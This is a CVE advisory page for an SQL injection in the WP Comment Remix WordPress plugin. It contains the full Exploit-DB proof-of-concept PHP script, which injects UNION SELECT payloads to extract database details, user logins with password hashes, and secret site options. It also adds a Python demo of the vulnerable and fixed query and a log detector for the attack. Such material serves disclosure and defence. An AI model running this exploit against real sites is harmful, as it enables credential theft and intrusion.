CVE-2008-4732 : Details

CVE-2008-4732

Vulnerability type: SQL Injection
OWASP Top 10 category: A03-Injection
EPSS score (V3): 0.27%
Attack vector: Network
Published: 2008-10-24 08:00 +00:00
Last modified: 2018-10-11 17:57 +00:00

CVE Description

SQL injection vulnerability in ajax_comments.php in the WP Comment Remix plugin before 1.4.4 for WordPress allows remote attackers to execute arbitrary SQL commands via the p parameter.
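The description above is the whole technical record of the bug: the `p` request parameter reaches the comments query as SQL rather than as a value. The following is an added example, not the plugin's code (the real ajax_comments.php source is not reproduced on this page), showing a hypothetical reconstruction of that query-building pattern beside its parameterised fix, and exercising both with the same UNION payload shape the public PoC uses. Everything here is assumed or constructed: the SQLite in-memory database stands in for MySQL (so string concatenation is `||` instead of CONCAT() and the PoC's quote-free hex literals are written as ordinary quoted strings), the 15-column wp_comments layout mirrors the WordPress 2.x comments table (the reason the PoC's UNION SELECT carries exactly 15 expressions), and the user rows and hashes are fake sample data.

```python
"""Added example (not the plugin's code): how the CVE-2008-4732 UNION injection
works against an unparameterised comments query, and the parameterised fix.
Schema, rows and the vulnerable query text are constructed for this demo;
the vulnerable query is a hypothetical reconstruction of the pattern the CVE
description implies (the `p` value spliced into the SQL string).
SQLite replaces MySQL here: concatenation is `||` rather than CONCAT(), and the
PoC's hex literals (used to avoid quotes) are written as quoted strings."""
import re
import sqlite3

# WordPress 2.x comments table: 15 columns, which is why the PoC's UNION SELECT
# carries exactly 15 expressions. Position 9 is comment_content, the field the
# plugin echoes back inside <p>...</p>, so that is where the payload lands.
SCHEMA = """
CREATE TABLE wp_comments (
    comment_ID INTEGER PRIMARY KEY, comment_post_ID INTEGER, comment_author TEXT,
    comment_author_email TEXT, comment_author_url TEXT, comment_author_IP TEXT,
    comment_date TEXT, comment_date_gmt TEXT, comment_content TEXT,
    comment_karma INTEGER, comment_approved TEXT, comment_agent TEXT,
    comment_type TEXT, comment_parent INTEGER, user_id INTEGER);
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
-- constructed sample rows (hashes are fake)
INSERT INTO wp_comments VALUES (1, 1, 'alice', 'a@example.invalid', '', '127.0.0.1',
    '2008-10-01', '2008-10-01', 'first post', 0, '1', 'curl', '', 0, 0);
INSERT INTO wp_users VALUES (1, 'admin', '$P$BconstructedHashNotReal0000000000');
INSERT INTO wp_users VALUES (2, 'editor', '5f4dcc3b5aa765d61d8327deb882cf99');
"""


def open_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_comments_query(conn, p):
    """Hypothetical reconstruction of the bug: `p` is interpolated into the SQL."""
    sql = f"SELECT * FROM wp_comments WHERE comment_post_ID = {p} AND comment_approved = '1'"
    return conn.execute(sql).fetchall()


def safe_comments_query(conn, p):
    """Fix: validate the type, then bind the value so the engine never parses it as SQL."""
    post_id = int(p)  # raises ValueError for anything that is not an integer
    sql = "SELECT * FROM wp_comments WHERE comment_post_ID = ? AND comment_approved = '1'"
    return conn.execute(sql, (post_id,)).fetchall()


# Same shape as the PoC's "users" payload: post 0 has no comments, so every row
# returned comes from the UNIONed wp_users select. /**/ replaces spaces and the
# trailing -- comments out whatever the original query appended after `p`.
USERS_PAYLOAD = (
    "0/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,"
    "'user{'||user_login||'}pass{'||user_pass||'}',"
    "10,11,12,13,14,15/**/FROM/**/wp_users--"
)


def extract_credentials(rows):
    """Pull login/hash pairs out of the comment_content column (index 8),
    the same way the PoC's preg_match_all does on the rendered page."""
    found = {}
    for row in rows:
        m = re.search(r"user\{(.+?)\}pass\{(.+?)\}", str(row[8]))
        if m:
            found[m.group(1)] = m.group(2)
    return found


def demo():
    """Returns (credentials leaked by the vulnerable query, whether the fixed query rejected the payload)."""
    conn = open_demo_db()
    leaked = extract_credentials(vulnerable_comments_query(conn, USERS_PAYLOAD))
    try:
        safe_comments_query(conn, USERS_PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("leaked via vulnerable query:", leaked)
    print("payload rejected by fixed query:", blocked)
```

The fix has two layers on purpose: the `int()` cast rejects the payload before any SQL is built, and the `?` placeholder means that even a string that slips past validation is sent as data, not concatenated into the statement. The PoC's hex literals and `/**/` separators are evasions of magic_quotes and naive space filtering, neither of which is a defence against this bug; only the binding is.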

CVE Information

Related Weaknesses

CWE-ID | Weakness name | Source
CWE-89 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Metrics

Metric | Score | Severity | CVSS Vector | Source
V2 | 7.5 | High | AV:N/AC:L/Au:N/C:P/I:P/A:P | [email protected]

EPSS

EPSS is a scoring model that predicts the probability that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that the vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of all other CVEs. The percentile therefore places one CVE's EPSS score relative to the rest.

Exploit Information

Exploit Database EDB-ID: 6747

Publication date: 2008-10-13 22:00 +00:00
Author: g30rg3_x
EDB Verified: Yes

<?php
/**
 * WP Comment Remix 1.4.3 SQL Injection
 * Proof of Concept
 * By g30rg3_x <g30rg3x_at_chxsecurity_dot_org>
 *
 * Advisory:
 * http://chxsecurity.org/advisories/adv-3-full.txt
 *
 * PoC Mirror:
 * http://chxsecurity.org/proof-of-concepts/wp-comment-remix-143.zip
 *
 * Attention:
 * This is a Proof-of-Concept it was never intended to be fully functional
 *
 * Notes:
 * Uses cURL
 */

// Script Header
function head() {
    print "\n WP Comment Remix 1.4.3 SQL Injection";
    print "\n By g30rg3_x <g30rg3x_at_chxsecurity_dot_org>";
    print "\n ------------------------------------------------";
    print "\n This is a Proof-of-Concept it was never intended to be fully functional\n";
}

// Usage Information
function usage() {
    global $argv;
    head();
    print "\n Usage: php {$argv[0]} <host> <path> <information> <table-prefix>\n";
    print "\n <host>: Hostname or IP Address";
    print "\n <path>: Path to WordPress (Defaults to: /)";
    print "\n <information>: Information to Extract (Defaults to: relevant)";
    print "\n dbinfo = Extract MySQL Current User, Database and Version";
    print "\n admins = Extract Only Admins (users with level 10)";
    print "\n users = Extract All Users (includes admins)";
    print "\n options = Extract Relevant Options like active_plugins, secret, ...";
    print "\n alloptions = Extract All Options (Huge data would be directly printed out!)";
    print "\n relevant = dbinfo + admins + options";
    print "\n all = dbinfo + users + alloptions";
    print "\n <table-prefix>: WordPress Tables Prefix (Defaults to: wp_)\n";
    print "\n Examples:";
    print "\n php {$argv[0]} foo.bar";
    print "\n php {$argv[0]} foo.bar /wordpress/";
    print "\n php {$argv[0]} foo.bar /wordpress/ all foo_";
    print "\n";
    exit();
}

// cURL HTTP GET: returns the raw response (headers included) on 200 OK, false otherwise
function GET($url) {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_HEADER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Connection: Close'));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_USERAGENT, 'WP-Comment-Remix 1.4.3 SQL Injection Proof-of-Concept');
    $result = curl_exec($ch);
    curl_close($ch);
    if ( preg_match('%HTTP/[0-9.x]+ 200 OK%', $result) )
        return $result;
    else
        return false;
}

// Obtain Database Information (user(), database(), version() via the 9th UNION column)
function obtainDBInfo() {
    global $prefix, $url;
    $injection = '/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(0x757365727B,user(),0x7D44427B,database(),0x7D76657273696F6E7B,version(),0x7D),10,11,12,13,14,15--';
    $result = GET($url . $injection);
    preg_match_all('/user\{(?P<user>.+)\}DB\{(?P<DB>.+)\}version\{(?P<version>.+)\}/', $result, $captured, PREG_PATTERN_ORDER);
    $db['user'] = $captured['user'][0];
    $db['name'] = $captured['DB'][0];
    $db['version'] = $captured['version'][0];
    return $db;
}

// Obtain WordPress Users Information (all users, or only user_level 10 via usermeta)
function obtainUsersInfo($all = false) {
    global $prefix, $url;
    $injection = "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(0x757365727B,{$prefix}users.user_login,0x7D706173737B,{$prefix}users.user_pass,0x7D),10,11,12,13,14,15/**/FROM/**/{$prefix}users" . ( $all ? '' : ",{$prefix}usermeta/**/WHERE/**/{$prefix}users.ID={$prefix}usermeta.user_id/**/AND/**/{$prefix}usermeta.meta_key/**/REGEXP/**/0x757365725F6C6576656C/**/AND/**/{$prefix}usermeta.meta_value=10" ) . '--';
    $result = GET($url . $injection);
    preg_match_all('/user\{(?P<user>.+)\}pass\{(?P<pass>.+)\}/', $result, $captured, PREG_PATTERN_ORDER);
    $users = array();
    for( $i = 0; $i < count($captured['user']); $i++ )
        $users[$captured['user'][$i]] = $captured['pass'][$i];
    return $users;
}

// Obtain WordPress Options Information (all options, or only names matching the hex REGEXP: siteurl|login|user|pass|auth|secret|salt|active_plugins|seed)
function obtainOptionsInfo($all = false) {
    global $prefix, $url;
    $injection = "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(option_name,0x7B7C,option_value,0x7C7D),10,11,12,13,14,15/**/FROM/**/{$prefix}options" . ( $all ? '' : '/**/WHERE/**/option_name/**/REGEXP/**/0x7369746575726C7C6C6F67696E7C757365727C706173737C617574687C7365637265747C73616C747C6163746976655F706C7567696E737C73656564' ) . '--';
    $result = GET($url . $injection);
    preg_match_all('%<p>(?P<name>.+)\{\|(?P<value>.+)\|\}</p>%', $result, $captured, PREG_PATTERN_ORDER);
    $options = array();
    for( $i = 0; $i < count($captured['name']); $i++ )
        $options[$captured['name'][$i]] = $captured['value'][$i];
    return $options;
}

// Set no time limit (only if safe mode is off)
if ( !ini_get('safe_mode') ) set_time_limit(0);

// Print usage if there is no host
if ( !isset($argv[1]) ) usage();

// Header, Arguments and Generate URL
head();
$host = $argv[1];
$path = isset($argv[2]) ? $argv[2] : '/';
$info = isset($argv[3]) ? $argv[3] : 'relevant';
$prefix = isset($argv[4]) ? $argv[4] : 'wp_';
$url = 'http://' . $host . $path . 'wp-content/plugins/wp-comment-remix/ajax_comments.php?p=0';

// Check if we can reach "ajax_comments.php"
print "\n Does ajax_comments.php exist? ... ";
$result = GET($url);
if ( !$result ) {
    print "No";
    print "\n -----------------------------------------------------------";
    print "\n Seems that the site does not have WP Comment Remix installed";
    print "\n OR the path you proportionate is incorrect.";
    print "\n Please review your arguments and try again.\n";
    exit();
}
print 'Yes';

// Check if is it possible to inject...
// ToDo: Some WordPress installations return more than 15 columns (this is caused by some plugins that alter
// the comments table structure and don't revert back this change) so this injection may fail A LOT in a non-default
// environment (ie. sites with many plugins), so if you REALLY want this PoC to be more "functional" then improve
// this part of the PoC; it was never my intention to deliver a "fully functional" Proof-of-Concept.
print "\n Can we Inject SQL Code? ... ";
$result = GET($url . '/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--');
if ( preg_match('/There are no comments for this post/', $result) ) {
    print "No";
    print "\n --------------------------------------";
    print "\n Seems that the host is already patched.\n";
    exit();
}
print 'Yes';

// Check table prefix but don't check if the user selected to obtain database information.
if ( $info != 'dbinfo') {
    print "\n Is \"{$prefix}\" the table prefix? ... ";
    $result = GET($url . "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/{$prefix}users--");
    if ( preg_match('/There are no comments for this post/', $result) ) {
        print "No";
        print "\n ------------------------------------------------";
        print "\n Seems that the table prefix \"{$prefix}\" is incorrect.";
        print "\n But this time we are not exiting, cause we can still extract";
        print "\n the database information, so I'm just going to change your choice";
        print "\n to dbinfo so you can still get that valuable information.";
        print "\n ------------------------------------------------\n";
        $info = 'dbinfo';
    } else {
        print 'Yes';
    }
}

// Now is time to inject
print "\n\n Seems that everything is fine so now it's super fun time :P...";
switch($info) {
    case 'all':
        $db = obtainDBInfo();
        $users = obtainUsersInfo(true);
        $options = obtainOptionsInfo(true);
        break;
    case 'relevant':
        $db = obtainDBInfo();
        $users = obtainUsersInfo();
        $options = obtainOptionsInfo();
        break;
    case 'dbinfo':
        $db = obtainDBInfo();
        break;
    case 'admins':
        $users = obtainUsersInfo();
        break;
    case 'users':
        $users = obtainUsersInfo(true);
        break;
    case 'options':
        $options = obtainOptionsInfo();
        break;
    case 'alloptions':
        $options = obtainOptionsInfo(true);
        break;
}

/* It's Show Time */
// Database Information
if ( !empty($db) ) {
    print "\n\n Database Information";
    print "\n ---------------------";
    print "\n MySQL User: {$db['user']}";
    print "\n MySQL Version: {$db['version']}";
    print "\n MySQL Database Name: {$db['name']}";
}

// Users Information
if ( !empty($users) ) {
    print "\n\n Users";
    print "\n ---------";
    foreach( (array) $users as $user => $pass ) {
        print "\n Username: {$user}";
        print "\n Password: {$pass} " . ( strlen($pass) <= 32 ? '(MD5)' : '(Passhash)' );
        print "\n ---------";
    }
}

// Options Information
if ( !empty($options) ) {
    print "\n\n Options";
    print "\n ---------";
    foreach( (array) $options as $name => $value ) {
        print "\n Name: {$name}";
        print "\n Value: {$value}";
        print "\n ---------";
    }
}

// Good Bye =)
print "\n\n Have Fun! =)\n";
?>

# milw0rm.com [2008-10-14]
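The PoC above leaves a recognisable footprint in web-server access logs: requests to the plugin's ajax_comments.php whose `p` parameter is not a bare integer, carries a `/**/`-separated `UNION SELECT`, ends in a `--` comment, and (for the unmodified script) arrives with the hard-coded User-Agent string from the GET() function. The following is an added example, not part of the advisory or the PoC, of a detection pass over combined-format access log lines. The log lines are constructed for the demo; the indicators are taken from the exploit code as printed on this page, and the double URL-decoding and comment stripping are the author's own generalisation to catch encoded variants of the same payload.

```python
"""Added example (not from the advisory or the PoC): flag access-log lines that
match the request pattern the CVE-2008-4732 PoC generates. Log lines below are
constructed; indicators come from the PoC code (plugin path, `p` parameter,
/**/-separated UNION SELECT, trailing --, hard-coded User-Agent)."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

POC_USER_AGENT = "WP-Comment-Remix 1.4.3 SQL Injection Proof-of-Concept"
TARGET_SCRIPT = "/wp-content/plugins/wp-comment-remix/ajax_comments.php"

# Apache/nginx combined log format:
# ip - - [ts] "METHOD target HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE)

# Constructed sample log: one benign plugin request, the PoC's column-count probe
# as curl sends it (raw /**/), the same probe percent-encoded under a WordPress
# subdirectory, and an unrelated request that also happens to use a `p` parameter.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Oct/2008:10:01:02 +0000] "GET /wp-content/plugins/wp-comment-remix/ajax_comments.php?p=12 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [14/Oct/2008:10:02:17 +0000] "GET /wp-content/plugins/wp-comment-remix/ajax_comments.php?p=0/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- HTTP/1.1" 200 301 "-" "WP-Comment-Remix 1.4.3 SQL Injection Proof-of-Concept"',
    '198.51.100.9 - - [14/Oct/2008:10:02:18 +0000] "GET /wordpress/wp-content/plugins/wp-comment-remix/ajax_comments.php?p=0%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- HTTP/1.1" 200 301 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [14/Oct/2008:10:03:00 +0000] "GET /index.php?p=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def normalise_p(raw):
    """Undo the PoC's evasions before inspecting: URL-decode twice (double-encoded
    variants) and turn inline /**/ comments back into spaces."""
    value = unquote(unquote(raw))
    return re.sub(r"/\*.*?\*/", " ", value)


def classify(line):
    """Return the list of reasons a line looks like CVE-2008-4732 exploitation ([] if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    reasons = []
    parts = urlsplit(m.group("target"))
    if parts.path.endswith(TARGET_SCRIPT):
        for raw in parse_qs(parts.query, keep_blank_values=True).get("p", []):
            p = normalise_p(raw)
            if not re.fullmatch(r"\d+", p.strip()):
                reasons.append("non-numeric p")
            if UNION_RE.search(p):
                reasons.append("UNION SELECT in p")
            if p.rstrip().endswith("--"):
                reasons.append("trailing comment in p")
    if m.group("ua") == POC_USER_AGENT:
        reasons.append("PoC User-Agent")
    return reasons


def scan(lines):
    """One record per flagged line: source IP plus the reasons it was flagged."""
    hits = []
    for line in lines:
        reasons = classify(line)
        if reasons:
            hits.append({"ip": LOG_RE.match(line).group("ip"), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], ", ".join(hit["reasons"]))
```

The User-Agent match is the weakest signal (trivially changed by anyone who edits the script), so it is reported alongside the payload indicators rather than used alone. The `non-numeric p` check is the durable one: on an unpatched site ajax_comments.php only ever needs an integer post ID, so anything else in `p` is worth a look regardless of how it is encoded.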

Products Mentioned

Configuration 0

Pressography >> Wp_comment_remix_plugin >> versions up to and including 1.4.3
    Pressography >> Wp_comment_remix_plugin >> version 1.4
    Wordpress >> Wordpress >> version *

References

http://secunia.com/advisories/32253
Tags: third-party-advisory, x_refsource_SECUNIA
https://www.exploit-db.com/exploits/6747
Tags: exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/31750
Tags: vdb-entry, x_refsource_BID
http://securityreason.com/securityalert/4492
Tags: third-party-advisory, x_refsource_SREASON